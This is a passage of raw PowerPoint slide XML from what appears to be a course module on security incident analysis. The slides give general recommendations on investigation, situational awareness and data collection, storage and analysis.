            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More Analysis Recommendations </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80898" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD561D25-9E07-D340-81CD-060A8EEBEC1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8685213" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:buFont typeface="Noto Sans Symbols" charset="0"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Become well versed in your constituency and your critical resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Noto Sans Symbols" charset="0"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maximize proactive activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Merriweather Sans" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stay familiar with current threats and trends </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Merriweather Sans" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Predict future challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Noto Sans Symbols" charset="0"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shorten time required to investigate incidents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Noto Sans Symbols" charset="0"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Traverse all relevant sources and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Check each of the related datasets in your data store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Think of the ways to extract interesting information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Facilitate additional data collection and integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure quality of data sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Noto Sans Symbols" charset="0"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raise productivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use robust interactive and automated tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use well-documented processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Apply visualization techniques to understand data better</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4DD5F1-0F97-7C4A-A620-A80F3C8E76AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1520825"/>
            <a:ext cx="8228012"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82946" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37010FCB-3A32-F140-93D4-52F003BF833A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="2093913"/>
            <a:ext cx="5229225" cy="3417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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E12511-31BA-CF4C-A5F7-F4FF72F01493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis Is a Main Part of Your Job </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11266" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AB2005-A588-A84A-A99E-29B2F095134D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="3294063"/>
            <a:ext cx="8256587" cy="2216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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inputs and outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Investigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploratory analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Situational awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD80869-92F4-524E-8E18-8B283927CE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="107504" y="1313616"/>
            <a:ext cx="8889840" cy="1899360"/>
            <a:chOff x="126360" y="2546332"/>
            <a:chExt cx="8889840" cy="1899360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="CustomShape 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3615E856-74FD-914C-877E-FC1A87134071}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="3678840" y="3308338"/>
              <a:ext cx="1532160" cy="414720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009900"/>
            </a:solid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1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>store</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="CustomShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED7283E-3F83-E84E-9D58-D78D21FE820F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="4661280" y="3308339"/>
              <a:ext cx="1532160" cy="414720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92EB50"/>
            </a:solid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1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>analyze</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="CustomShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D30B5B-BA1E-1240-A7F9-3C2CEC848A5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3671640" y="3515518"/>
              <a:ext cx="564840" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="002541"/>
              </a:solidFill>
              <a:miter/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:effectRef>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="CustomShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFB58BD-22AE-DF4D-B022-4013720F1377}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4653720" y="3515518"/>
              <a:ext cx="564840" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="002541"/>
              </a:solidFill>
              <a:miter/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:effectRef>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="CustomShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249B4D64-64B5-484D-857C-F15838B0C97E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1727280" y="3308339"/>
              <a:ext cx="1532160" cy="414720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009900"/>
            </a:solid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1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>collect</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="CustomShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
